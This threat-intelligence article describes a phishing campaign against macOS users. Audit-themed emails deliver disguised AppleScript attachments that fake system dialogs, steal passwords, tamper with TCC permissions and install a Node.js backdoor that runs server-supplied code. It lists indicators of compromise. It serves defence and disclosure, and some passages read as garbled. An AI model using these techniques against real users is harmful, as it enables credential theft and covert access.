Targeting macOS users, a sophisticated phishing campaign poses as urgent business requests, like "audit/compliance confirmation," in order to fool victims into opening malicious attachments. These attachments, which pose as Word or PDF files, contain fileless malware that establishes persistent remote access and steals credentials. Emails requesting that recipients "confirm the company's legal English name" are the first part of the campaign.

Pretexts such as "FY2025 External Audit" or "Token Vesting Confirmation submission deadline" are used by attackers as follow-up. Attachments with names like "Confirmation_Token_Vesting.docx.scpt" are sent to victims. It is actually an AppleScript (.scpt) file, even though the double extension looks like a secure DOCX file. In order to avoid detection, social engineering encourages users to enable macros or permissions, which starts a multi-stage infection chain that primarily runs in memory.

Analysis of Malware and Attack Chain The first step is the original AppleScript. It deceives users into believing their system is updating or fixing itself by opening the Software Update page in macOS System Settings. Emails for Compliance Data Theft (Source: Medium) It then collects information such as system language, macOS version, and CPU architecture (Intel or Apple Silicon).

A remote server at sevrrhst[. ]com receives this data and determines the subsequent payload. After that, the script clears up any traces after downloading and executing another malicious AppleScript from the same domain. To foster trust, this second script uses fictitious elements: "Fix system update issues" or "resolve document viewer problems" are claims made by a progress bar.

Realistic phishing pop-ups ask for passwords by imitating macOS dialogues, complete with Google avatars.

The script verifies user credentials using the dscl command after they are entered and clicked OK. Curl is used to exfiltrate valid passwords to sevrrhst[. ]com after they have been Base64-encoded with the username. The malware targets the TCC (Transparency, Consent, and Control) database on macOS in order to increase privileges.

Medium claims that in order to evade detection, it renames TCC directories, such as com.apple.TCC, and then inserts SQL to covertly grant permissions to script editors, Bash, Terminal, and itself. This makes it possible to access files (documents, desktop, external drives, and downloads), a camera, screen capture, keyboard monitoring, and accessibility features automatically. The encrypted data (referred to as "origin") is downloaded, decoded, dropped to disk, and executed by the script. It creates a backdoor that allows remote Bash commands to be sent to the C2 server.

It installs a Node.js runtime, then uses a "req=skip" request to fetch and run "index.js." Data Stealing via Compliance Emails (Source: Medium) Version, CPU, disk, network, and processes are among the system details reported by the Node.js core (index.js). The server replies with additional code that is dynamically run using eval().

This permits continued growth, such as data theft or continued persistence through the use of legal stealth tools. IOCs and Malicious Infrastructure Threat intelligence connects January 23, 2026, registration to sevrrhst[.]com. It resolves to IP 88.119.171.59, which is shared with more than ten similar domains, including tattomc[. ]com and stomcs[.]com.

It uses a free TLS certificate and fast-flux characteristics. Emails for Compliance Data Theft (Source: Medium) This is a complete intrusion chain that uses dynamic code and system tools to evade detection, not just a simple thief. Static antivirus software has trouble with it.

Type of Indicator Filename Value SHA256 3e4d35903c51db3da8d4bd77491b5c181b7361aaf152609d03a1e2bb86faee43 Confirmation_Token_Vesting.docx.scpt SHA256 filename env_arm.zip f9e0376114c57d659025ceb46f1ef48aa80b8af5909b2de0cf80e88040fef345 Filename index.js SHA256 0f1e457488fe799dee7ace7e1bc2df4c1793245f334a4298035652ebeb249414 URL https://sevrrhst[. ]com/css/controller.php URL https://sevrrhst[. ]com/inc/register.php C2 Domain sevrrhst[.

]com IP 88.119.171.59